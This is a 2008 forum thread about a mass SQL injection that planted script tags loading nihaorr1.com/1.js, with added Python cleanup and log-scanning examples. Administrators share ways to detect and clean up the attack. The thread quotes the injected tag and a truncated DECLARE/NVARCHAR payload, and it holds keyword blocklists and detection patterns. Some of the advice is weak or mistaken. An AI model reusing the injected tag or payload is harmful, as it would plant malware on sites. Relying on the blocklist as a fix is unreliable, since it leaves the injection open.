Thread: Anyone know about www.nihaorr1.com/1.js?

Last post 08-26-2008 12:21 AM by silkyfixer. 108 replies.

Page 3 of 8 (109 items)

  • 04-21-2008, 6:10 PM In reply to

    • pb_aldea
    • Not Ranked
    • Joined on 04-21-2008, 9:06 PM
    • Posts 3

    Re: Anyone know about www.nihaorr1.com/1.js?

    In the log files I found nothing, and form data is not logged anywhere.

    Lately I've found malformed links from my own site but they're not an issue; it's just the script that ran more than once on the same table and now the content has some strings like <scr<scr<script src=...

    I'm wondering if the system tables were affected too. This issue with my backup kept me stuck at my desk the whole weekend.
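
The cleanup problem described in the post above, as an added example that is not part of the original thread: a dry-run pass that removes whole and cut-off copies of the injected tag from a text column before any UPDATE is written. The exact tag form, the explanation that the fragments are copies cut at column width, the sample rows and all function names are assumptions; only the URL comes from the thread.

```python
import re

# Assumed form of the injected tag; only the URL comes from the thread.
INJECTED_TAG = "<script src=http://www.nihaorr1.com/1.js></script>"

def strip_injected(value, tag=INJECTED_TAG, min_fragment=4):
    """Remove whole copies of `tag` and trailing cut-off copies of it."""
    changed = True
    while changed:
        changed = False
        # 1. Whole copies anywhere in the value, ignoring case.
        cleaned = re.sub(re.escape(tag), "", value, flags=re.IGNORECASE)
        if cleaned != value:
            value, changed = cleaned, True
        # 2. A trailing fragment: the value ends with a proper prefix of the
        #    tag. Try the longest prefix first; min_fragment avoids eating a
        #    legitimate trailing "<" or "<s".
        for n in range(len(tag) - 1, min_fragment - 1, -1):
            if value.lower().endswith(tag[:n].lower()):
                value, changed = value[:-n], True
                break
    return value

def plan_cleanup(rows, tag=INJECTED_TAG):
    """Dry run: return (row_id, before, after) for each row that would change."""
    plan = []
    for row_id, value in rows:
        cleaned = strip_injected(value, tag)
        if cleaned != value:
            plan.append((row_id, value, cleaned))
    return plan

# Constructed rows standing in for a text column read from the database.
SAMPLE_ROWS = [
    (1, "Red house"),
    (2, "Blue house" + INJECTED_TAG),
    (3, "Green house" + INJECTED_TAG + INJECTED_TAG[:30]),
    (4, "Old barn<scr<scr<script src="),
    (5, "Price < 100"),
]

if __name__ == "__main__":
    for row_id, before, after in plan_cleanup(SAMPLE_ROWS):
        print(row_id, repr(before), "->", repr(after))
```

Review the plan output against a backup copy before turning it into UPDATE statements; cleaning the data does not close the page that let the injection in.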

  • 04-21-2008, 8:08 PM In reply to

    • Sleuth23
    • Not Ranked
    • Joined on 04-21-2008, 9:45 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    Maybe someone can answer this.

    Would it be safe to assume that if there is nothing in the IIS logs, it was because the inject was form based?

    If it was URL based, would I see something in the IIS logs?

    The server was restored but I can't recommend it go back online until we identify the attack vector and vulnerability. If it is just a poorly coded form or two, that is an easy fix.

    Any help appreciated.

  • 04-21-2008, 11:07 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    If it's in a querystring variable, this would be logged into your IISLogs.  SQL injections can happen in a form post, but normally it is a malformed URL.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield

    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 04-21-2008, 11:56 PM In reply to

    • Sleuth23
    • Not Ranked
    • Joined on 04-21-2008, 9:45 PM
    • Posts 4

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks Steve.

    I have found nothing in the IIS logs thus far. I am still looking though.

    Anywhere else I should be looking?
     

  • 04-22-2008, 9:22 AM In reply to

    • lossman
    • Not Ranked
    • Joined on 04-22-2008, 1:20 PM
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks for all the info.

    I did set up the Profiler assuming you meant to track Exec: Prepared SQL.  I didn't change any other defaults.

    Brett

  • 04-23-2008, 6:54 PM In reply to

    • bestis
    • Not Ranked
    • Joined on 04-23-2008, 10:49 PM
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

    This is a site that is reached when a user clicks on an attachment (lately Tibetan rights stuff) that downloads an infected JavaScript file. It is malicious and you really need to block it incoming and outgoing. If you go to http://whois.domaintools.com/nihaorr1.com you'll see that it is hosted in China.

  • 04-24-2008, 2:06 PM In reply to

    • fabrica.cz
    • Not Ranked
    • Joined on 04-24-2008, 5:57 PM
    • Czech rep.
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

    That helped me. For the SQL user, disallow permission for SELECT for tables syscolumns and sysobjects.

  • 04-24-2008, 5:11 PM In reply to

    • nhertz
    • Not Ranked
    • Joined on 04-21-2008, 12:14 AM
    • Posts 2

    Re: Anyone know about www.nihaorr1.com/1.js?

    I would advise anyone affected by this attack to activate the SQL profiler (or equivalent) and set it to record only EXEC commands. If your website then becomes infected again you can quickly scroll through the profiler output and find the "suspicious" command where the injection has entered. This should also give you a hint of the exact page that had the vulnerability.

    I cleaned up a site this week where the profiler had recorded:

    SELECT TOP 100 People.Countries, States.Titles, Houses.Types FROM People, States, Houses Where People.Titles LIKE '%agent;DECLARE @S NVARCHAR(4000);SET etc......

    So I could quickly locate the page which had the SELECT TOP 100 statement.
    That is where I added the quick fix:

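    <%
    ' some code here....
    %>
    <!--#include file="validator.asp"-->
    <%
    ' validator.asp has already inspected the sql string at this point
    rs.Open sql
    %>

    With the validator file containing:

    <%
    ' Quick fix: abandon the request if the assembled SQL string
    ' contains markers seen in the injected statement
    If InStr(LCase(sql), ";--") > 0 Then
        Response.Redirect("index.asp")
    End If

    If InStr(LCase(sql), "nvarchar") > 0 Then
        Response.Redirect("index.asp")
    End If
    %>

    Cheers and good luck,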

    Nicolai Hertz
    software programmer

  • 04-25-2008, 1:22 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    You guys need to get a clue...it's called prepared statements. 

  • 04-25-2008, 3:42 PM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 10:00 AM
    • London, UK
    • Posts 749

    Re: Anyone know about www.nihaorr1.com/1.js?

    Now the story is on Slashdot with links to this thread

    http://it.slashdot.org/article.pl?sid=08/04/25/1358234

    so beware the LAMPs trolls...*waves*...:) and the increased traffic to Steve's server. :) It also links to http://www.f-secure.com/weblog/archives/00001427.html which is a good summary, basically what is said in this thread with a few extras.
    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-25-2008, 3:49 PM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 10:00 AM
    • London, UK
    • Posts 749

    Re: Anyone know about www.nihaorr1.com/1.js?

    xp_cmdshell:

    You guys need to get a clue...it's called prepared statements. 

     


    Thanks for that, but who needs to get a clue?

    Have you ever been a web hosting admin? I expect not. You might be one of the few devs that can actually code properly and hence can fix the problem. Admins don't; we just have bad devs that cannot code properly and we try and minimise the damage. What can we do, shut down the database?

    It seems clear now that it is the slack devs' fault; you are casting blame in the wrong place.

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-25-2008, 5:12 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to SQL injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But it is one layer deeper.  Only good error coding can prevent it.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield

    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 04-25-2008, 5:45 PM In reply to

    • jdybka
    • Not Ranked
    • Joined on 04-25-2008, 9:38 PM
    • TN
    • Posts 1

    Re: Anyone know about www.nihaorr1.com/1.js?

     I use a filter called WebKnight to filter out SQL injection attempts and other crud. You can Google it - it's open source and can give you some .htaccess functionality for IIS.

    It is blocking these requests from China for us.

    It's installed as an isapi filter.

    Jilly
     

  • 04-25-2008, 6:32 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    steve schofield:

    Prepared statements generally are stored procedures, at least that is my understanding.  Dynamic SQL type pages can be exposed to SQL injection attacks.  Of course if the stored procedure takes input without being validated, it can be also.  But it is one layer deeper.  Only good error coding can prevent it.

    Imports System.Data
    Imports System.Data.SqlClient

    ' Untrusted value taken from the query string
    Dim UserSuppliedString As String = Request.QueryString("UserSuppliedString")

    ' The SQL text holds only a placeholder; the value is bound separately
    Dim cmd As New SqlCommand("SELECT * FROM blahblah WHERE id = @au_id")
    Dim param As New SqlParameter("@au_id", SqlDbType.VarChar)
    param.Value = UserSuppliedString
    cmd.Parameters.Add(param)


  • 04-26-2008, 5:56 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks for posting a clarification.  btw.

    For those who want to use Log parser to detect in your IISLogs if you've been hit, here are a few log parser examples.

    'This will find all webpages that had sql injection.  You can change the wording between the %% to look for a different string
    logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%CAST%'" -o:csv

    'This will give you the first time your site was hit, if applicable. 
    logparser -i:iisw3c "select date,time,cs-uri-stem,cs-uri-query from <example.com> where cs-uri-query like '%1.js%'" -o:csv

    'Download Log Parser 2.2
    http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1287

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield

    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
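
The same log search as the Log Parser commands above, as an added example that is not part of the original post: it URL-decodes each query string before matching, reports the first flagged request per page, and lists POST targets, since form bodies are not in the IIS log. The sample log lines, IP addresses, page names and function names are constructed; the markers are the ones quoted in the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample in IIS W3C format; IPs, paths and timestamps are made up.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-04-17 10:02:11 GET /default.asp - 192.0.2.10 200
2008-04-17 10:05:42 GET /search.asp title=agent;DECLARE%20%40S%20NVARCHAR(4000);SET%20%40S=CAST(PLACEHOLDER) 198.51.100.7 200
2008-04-17 10:06:03 POST /contact.asp - 198.51.100.7 302
2008-04-17 10:09:30 GET /news.asp id=12 192.0.2.44 200
2008-04-18 08:15:00 GET /search.asp title=x;declare+@s+nvarchar(4000) 203.0.113.5 500
"""

# Markers from the thread: the CAST and 1.js searches, and the DECLARE ... NVARCHAR trace.
MARKERS = re.compile(r"cast\s*\(|declare\s+@\w+\s+n?varchar|1\.js", re.IGNORECASE)

def scan_iis_log(text):
    """Return (hits, post_stems): flagged requests, and pages that received POSTs."""
    fields, hits, post_stems = [], [], set()
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]            # the header can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if row.get("cs-method") == "POST":
            post_stems.add(row.get("cs-uri-stem"))   # body not logged: review the page code
        query = unquote_plus(row.get("cs-uri-query", "-"))   # decode %20, %40 and +
        if MARKERS.search(query):
            hits.append((row.get("date"), row.get("time"), row.get("c-ip"),
                         row.get("cs-uri-stem"), query))
    return hits, sorted(post_stems)

def first_hit_per_page(hits):
    """Earliest flagged request for each page: when and where the injection came in."""
    first = {}
    for date, time, ip, stem, _query in sorted(hits):
        first.setdefault(stem, (date, time, ip))
    return first

if __name__ == "__main__":
    found, posts = scan_iis_log(SAMPLE_LOG)
    print(first_hit_per_page(found))
    print("POST targets to review:", posts)
```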